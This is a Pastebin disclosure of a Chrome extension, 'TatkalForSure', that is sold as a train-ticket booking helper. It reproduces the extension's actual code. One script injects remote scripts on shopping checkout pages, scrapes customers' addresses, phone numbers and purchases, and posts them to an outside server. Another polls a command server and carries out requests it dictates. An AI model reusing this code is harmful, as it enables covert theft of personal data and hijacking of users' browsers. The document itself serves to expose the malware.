API tools faq
paste
Guest User

Untitled

a guest
May 3rd, 2018
159
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.68 KB | None | 0 0
raw download clone embed print report
  1. chrome web store url : https://chrome.google.com/webstore/detail/tatkal-for-sure-irctc-tat/mjibdhifibokijabebohlhfnmljbleff?utm_source=chrome-ntp-icon
  2. version: 1.0.131
  3.  
  4. The TatkalForSure extension from BuyHatke advertised as an extension to help users book tatkal train tickets but it has been doing the following malicious activities
  5.  
  6.  
  7. 1.Stealing user's personal information (Address,phonenumber,products bought in ecommerce store) and sending it to the buyhatke servers
  8.  
  9. 2.using user's computer without his/her knowledge to visit urls obtained from a command server . which can be used for hijacking affiliate marketing parameters of other sites, scraping websites, DDOS ,etc
  10.  
  11.  
  12. The following section explains how the extension is doing the above activities
  13.  
  14. 1.Stealing user's personal information:
  15.  
  16. ck.js which is a contentscript file (Extension has permission to execute this file on all pages a user visits) checks for the following patterns in the url of the page a user visit
  17.  
  18. "www.amazon.in/",
  19. "myntra.com/checkout/confirm",
  20. "myntra.com/checkout/paymen",
  21. "jabong.com/checkout/success",
  22. "ebay.in/OrderConfir",
  23. "snapdeal.com/prepareThankYouPage",
  24. "shopclues.com/atom/orderConfirmation",
  25. "paytmall.com/shop/summary",
  26. "www.flipkart.com/orderresponse",
  27.  
  28. and download a javascript file appropriate to a pattern and inject the javascript code into the dom
  29.  
  30. the injected javascript file reads the users personal information like products on their cart, address, mobile number etc and send it to BuyHatke servers
  31.  
  32. For example, when a user visits myntra.com and orders a product, the user will reach the payment page of that site whose url matches the pattern "myntra.com/checkout/paymen" so the ck.js will download a js file from "https://buyhatke.com/checkxyz/checkoutjs/myntracheck.js" and inject the javascript code in to the sites DOM. the injected code reads the users Address,phonenumber from the sites payment page and store it as a cookie with name "addressobject".
  33.  
  34. after payment "myntra.com" will take the user to order confirmation page whose url matches the pattern "myntra.com/checkout/paymen" so the ck.js will inject the javascript code from "https://buyhatke.com/checkxyz/checkoutjs/myntracheck.js" into sites DOM. the injected code reads a javascript object on "mynra.com" which contains information about the product bought by the user, then the injected code reads the "addressobject" cookie (which the injected js sets on the payment page, it contains the users address and phone number) and finally the injected js sends the stolen data (products purchased by the user, address and phone number of the user) as a post request to "https://tatkalforsure.com/checkoutjs/checkout.php".
  35.  
  36. The extension is using similar schemes and techniques as stated in the above example in many sites and steal users personal information which is only available to the user after their authentication, following is a list of sites (where the extensions malicious activity is known as of now ) and the source url of the code the extension injects.
  37.  
  38. site: amazon.in,
  39. injected script souce: https://buyhatke.com/checkxyz/checkoutjs/amazcook.js, https://buyhatke.com/checkxyz/checkoutjs/amazcheck.js
  40.  
  41. site: myntra.com,
  42. injected script source: https://buyhatke.com/checkxyz/checkoutjs/myntracheck.js
  43.  
  44. site: jabong.com,
  45. injected script source: https://buyhatke.com/checkxyz/checkoutjs/jabongcheck.js
  46.  
  47. site: ebay.in,
  48. injected script source: https://buyhatke.com/checkxyz/checkoutjs/ebaycheck.js
  49.  
  50. site: snapdeal.com,
  51. injected script source:https://buyhatke.com/checkxyz/checkoutjs/snapcheck.js
  52.  
  53. site: shopclues.com,
  54. injected script source: https://buyhatke.com/checkxyz/checkoutjs/shopcheck.js
  55.  
  56. site: paytmmall.com,
  57. injected script source: https://buyhatke.com/checkxyz/checkoutjs/paytmcheck.js
  58.  
  59. site : flipkart.com,
  60. injected script source: https://buyhatke.com/checkxyz/checkoutjs/flipcheck.js
  61.  
  62.  
  63. Following code listing from the ck.js file in the extension injects the downloads and injects the javascript code into the page
  64.  
  65.  
  66. var s = document.createElement("script"),
  67. j = document.createElement("script"),
  68. t = document.createElement("script");
  69. j.id = "bh-jquery", s.id = "bh-script", j.src = "https://code.jquery.com/jquery-3.2.1.min.js";
  70. var url = window.location.href;
  71. //here they check for flipkart.com and inject the js code relevant to flipkart.com
  72. url.split("www.flipkart.com/orderresponse").length > 1 && (s.src = "https://buyhatke.com/checkxyz/checkoutjs/flipcheck.js", (document.head || document.documentElement).appendChild(j),
  73. //here they check for amazon.in and inject the js code relevant to amazon.in
  74. (document.head || document.documentElement).appendChild(s)),
  75. url.split("www.amazon.in/").length > 1 && (s.src = "https://buyhatke.com/checkxyz/checkoutjs/amazcook.js", (document.head || document.documentElement).appendChild(j), (document.head || document.documentElement).appendChild(s)),
  76. url.split("www.amazon.in/").length > 1 && (t.src = "https://buyhatke.com/checkxyz/checkoutjs/amazcheck.js", (document.head || document.documentElement).appendChild(j),
  77. setTimeout(function() {
  78. (document.head || document.documentElement).appendChild(t)
  79. }, 400)),
  80. //here they check for myntra.com and inject the js code relevant to myntra.com
  81. (url.split("myntra.com/checkout/confirm").length > 1 || url.split("myntra.com/checkout/paymen").length > 1) && ((document.head || document.documentElement).appendChild(j), s.src = "https://buyhatke.com/checkxyz/checkoutjs/myntracheck.js",
  82. setTimeout(function() {
  83. (document.head || document.documentElement).appendChild(s)
  84. }, 400)),
  85. //here they check for jabong.com and inject the js code relevant to jabong.com
  86. url.split("jabong.com/checkout/success").length > 1 &&
  87. ((document.head || document.documentElement).appendChild(j),
  88. s.src = "https://buyhatke.com/checkxyz/checkoutjs/jabongcheck.js",
  89. (document.head || document.documentElement).appendChild(s)),
  90. //here they check for ebay.in and inject the js code relevant to ebay.in
  91. url.split("ebay.in/OrderConfir").length > 1 &&
  92. ((document.head || document.documentElement).appendChild(j),
  93. s.src = "https://buyhatke.com/checkxyz/checkoutjs/ebaycheck.js",
  94. (document.head || document.documentElement).appendChild(s)),
  95. //here they check for snapdeal.com and inject the js code relevant to snapdeal.com
  96. url.split("snapdeal.com/prepareThankYouPage").length > 1 &&
  97. ((document.head || document.documentElement).appendChild(j),
  98. s.src = "https://buyhatke.com/checkxyz/checkoutjs/snapcheck.js",
  99. (document.head || document.documentElement).appendChild(s)),
  100. //here they check for shopclues.com and inject the js code relevant to shopclues.com
  101. url.split("shopclues.com/atom/orderConfirmation").length > 1 &&
  102. ((document.head || document.documentElement).appendChild(j),
  103. s.src = "https://buyhatke.com/checkxyz/checkoutjs/shopcheck.js",
  104. (document.head || document.documentElement).appendChild(s)),
  105. //here they check for paytmall.com and inject the js code relevant to paytmall.com
  106. url.split("paytmall.com/shop/summary").length > 1 &&
  107. ((document.head || document.documentElement).appendChild(j),
  108. s.src = "https://buyhatke.com/checkxyz/checkoutjs/paytmcheck.js",
  109. (document.head || document.documentElement).appendChild(s));
  110.  
  111.  
  112.  
  113. Following is the code the the extension is injecting on myntra.com
  114.  
  115. console.log("loaded");
  116. var url = window.location.href;
  117. var urlcheck = "myntra.com/checkout/confirm";
  118. //this is where the code checks for order confirmation page
  119. if (url.split(urlcheck).length > 1) {
  120. //For more than one products
  121. //analyticsLayer is an javascript objec on myntra.com it contains information about the products on cart
  122. var analyticsLayer = analyticsLayer;
  123. //read the products bought by the user
  124. var noofproducts = analyticsLayer.products.length;
  125. var products = [];
  126. var k = 0;
  127. for (var i = 0; i < noofproducts; i++)
  128. {
  129. var productname = analyticsLayer.products[i]["Style-Name"];
  130. var productcode = analyticsLayer.products[i].SKU;
  131. var productsize = analyticsLayer.products[i].Size;
  132. var deliverydate = '';
  133. var quantity = parseFloat(analyticsLayer.products[i].Quantity);
  134. var sellername = "none";
  135. var productprice = parseFloat(analyticsLayer.products[i].Price);
  136. //For more than one order id
  137. var orderid = analyticsLayer.id;
  138. var product = {
  139. "name": encodeURIComponent(productname),
  140. "pid": encodeURIComponent(productcode),
  141. "quantity": encodeURIComponent(quantity),
  142. "size": '',
  143. "price": encodeURIComponent(productprice),
  144. "sellername": encodeURIComponent(sellername),
  145. "deliverydate": encodeURIComponent(deliverydate),
  146. "orderid": encodeURIComponent(orderid)
  147. }
  148. products.push(product);
  149. }
  150. products = JSON.stringify(products);
  151. products = encodeURIComponent(products);
  152. //Total amount (More than one order)
  153. var amount = analyticsLayer.revenue;
  154. //General for all
  155. var username = $(".user-name").text();
  156. var mobile = '';
  157. //gets the address from cookie set in previous page
  158. var addressobject = getCookie("addressobject");
  159. //addressobject=JSON.stringify(addressobject);
  160. var clienttime = Date.now();
  161. var date = Date.now();
  162. var email = '';
  163. var bankname = "bhuwan";
  164. var modeofpayment = $(".pmode").text().split("Payment Mode")[1].trim().replace(/[^\x20-\x7E]/gmi, " ");
  165. var website = 111;
  166. var jsonArr = [{
  167. 'modeofpayment': modeofpayment,
  168. 'orderid': orderid,
  169. 'bankname': bankname,
  170. 'email': email,
  171. 'date': date,
  172. 'amount': amount,
  173. 'username': username,
  174. 'mobile': mobile,
  175. 'address': addressobject,
  176. 'products': products,
  177. 'website': website,
  178. 'aff': 'thirdparty',
  179. 'param1': 'thirdparty',
  180. 'param2': 'thirdparty'
  181. }];
  182. // jsonArr = JSON.stringify(jsonArr);
  183. //code is formattig the stolen data
  184. var jsonParData = jsonArr;
  185. var parameters = "ext_id=10000001&auth_val=10000001";
  186. var L = jsonParData.length;
  187. for (var i = 0; i < L; i++) {
  188. var obj = jsonParData[i];
  189. for (var j in obj) {
  190. var paramKey = (j);
  191. var paramVal = (jsonParData[i][j]);
  192. parameters += "&" + paramKey + "=" + paramVal;
  193. }
  194. }
  195. // console.log("parameters"+parameters);
  196. //stolen data is sent to server
  197. //jsonArr = JSON.stringify(jsonArr);
  198. $.ajax({
  199. url: 'https://tatkalforsure.com/checkoutjs/checkout.php',
  200. type: 'post',
  201. dataType: 'json',
  202. success: function(data) {
  203. //$('#target').html(data.msg);
  204. console.log("done");
  205. },
  206. data: parameters
  207. });
  208. //console.log("type");
  209. }
  210. // this is where the code check for payment page on "myntra.com"
  211. //the code reads the address and phone no of the user and sets in as a cookie
  212. if (url.split("checkout/paymen").length > 1) {
  213. // alert("bhuwan");
  214. var fullname = $(".name").eq(0).text();
  215. var address1 = $("div.address").text();
  216. var address2 = $(".locality").text();
  217. var address = address1 + "," + address2;
  218. var landmark = "";
  219. var city = $(".city").text().split("-")[0].trim();
  220. var state = $(".state").text();
  221. var mobilenumber = $("div.mobile").text().split("Mobile:")[1].trim();
  222. var pincode = $(".city").text().split("-")[1].trim();
  223. var addressobject = {
  224. "type": '',
  225. "fullname": encodeURIComponent(fullname),
  226. "address1": encodeURIComponent(address1),
  227. "address2": encodeURIComponent(address2),
  228. "address": encodeURIComponent(address),
  229. "landmark": encodeURIComponent(landmark),
  230. "city": encodeURIComponent(city),
  231. "state": encodeURIComponent(state),
  232. "mobilenumber": encodeURIComponent(mobilenumber),
  233. "pincode": encodeURIComponent(pincode)
  234.  
  235. }
  236. addressobject = JSON.stringify(addressobject);
  237. addressobject = encodeURIComponent(addressobject);
  238. setCookie1("addressobject", addressobject);
  239. }
  240. function getCookie(cname) {
  241. var name = cname + "=";
  242. var ca = document.cookie.split(';');
  243. for (var i = 0; i < ca.length; i++) {
  244. var c = ca[i];
  245. while (c.charAt(0) == ' ') c = c.substring(1);
  246. if (c.indexOf(name) != -1) return c.substring(name.length, c.length);
  247. }
  248. return "";
  249. }
  250. function setCookie1(cname, cvalue, exdays) {
  251. var d = new Date();
  252. var dom = window
  253. d.setTime(d.getTime() + (exdays * 24 * 60 * 60 * 1000));
  254. var expires = "expires=" + d.toGMTString();
  255. document.cookie = cname + "=" + cvalue + "; " + expires + "; path=/;domain=" + "." + window.location.host.split(".")[1] + "." + window.location.host.split(".")[2];
  256. }
  257.  
  258. For the scripts injected in other sites use the url given in the above url listing.
  259.  
  260.  
  261. 2.using user's computer without their knowledge to visit unkonown urls
  262.  
  263. The extension's getpnr.js which is listed as background page script file(the extension has permission to run this script when ever the user keep their browser open) has code that communicate to a command server via http requests (it hits the url "https://advcrawler.buyhatke.com/tatkal/getOtherAPI/?rand=") every 10 minutes and based on the response from the server the code decides whether to visit a url or not. the server can decide what ajax request the extension has to make and after getting data from the ajax request the extension sends back that data to a server with endpoint "https://advcrawler.buyhatke.com/tatkalAPIs/submit.php" in a post http request
  264.  
  265. Following code from getpnr.js does the job of hitting a server every 10 min, get data and based on the data make a ajax request and send the result of the ajax request to server
  266.  
  267.  
  268.  
  269. function trainTwoFromAPI(settings, strMain, aparams) {
  270. var settings = JSON.parse(settings);
  271. //console.log(settings);
  272. //console.log("here532");
  273. $.ajax(settings).done(function(response) {
  274.  
  275. if (isJson(response) === true) {
  276. response = JSON.stringify(response);
  277. }
  278. $.post("https://advcrawler.buyhatke.com/tatkalAPIs/submit.php", {
  279. "id": strMain,
  280. "response": response,
  281. "flag": 1,
  282. "aparams": aparams
  283. }).then(function() {
  284. // console.log("Yay!");
  285. });
  286. // console.log(response);
  287. }).fail(function($xhr) {
  288. var dataResp = $xhr.responseText;
  289. $.post("https://advcrawler.buyhatke.com/tatkalAPIs/fail.php", {
  290. "response": $xhr.responseText,
  291. "id": strMain,
  292. "flag": 1,
  293. "aparams": aparams
  294. }).then(function() {});
  295. });
  296. }
  297.  
  298. function tcs2() {
  299. $.ajax("https://advcrawler.buyhatke.com/tatkal/getOtherAPI/?rand=" + parseInt(20000000000 * Math.random()), {}).then(function(dataCrawl) {
  300. console.log(dataCrawl.status);
  301. if (dataCrawl.status) {
  302. urlCrawl = dataCrawl.data;
  303. trainTwoFromAPI(urlCrawl, dataCrawl.strMain, dataCrawl.aparams);
  304. }
  305. });
  306. }
  307. setInterval(function() {
  308. tcs2();
  309. }, 10 * 60000);
  310. tcs2();
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!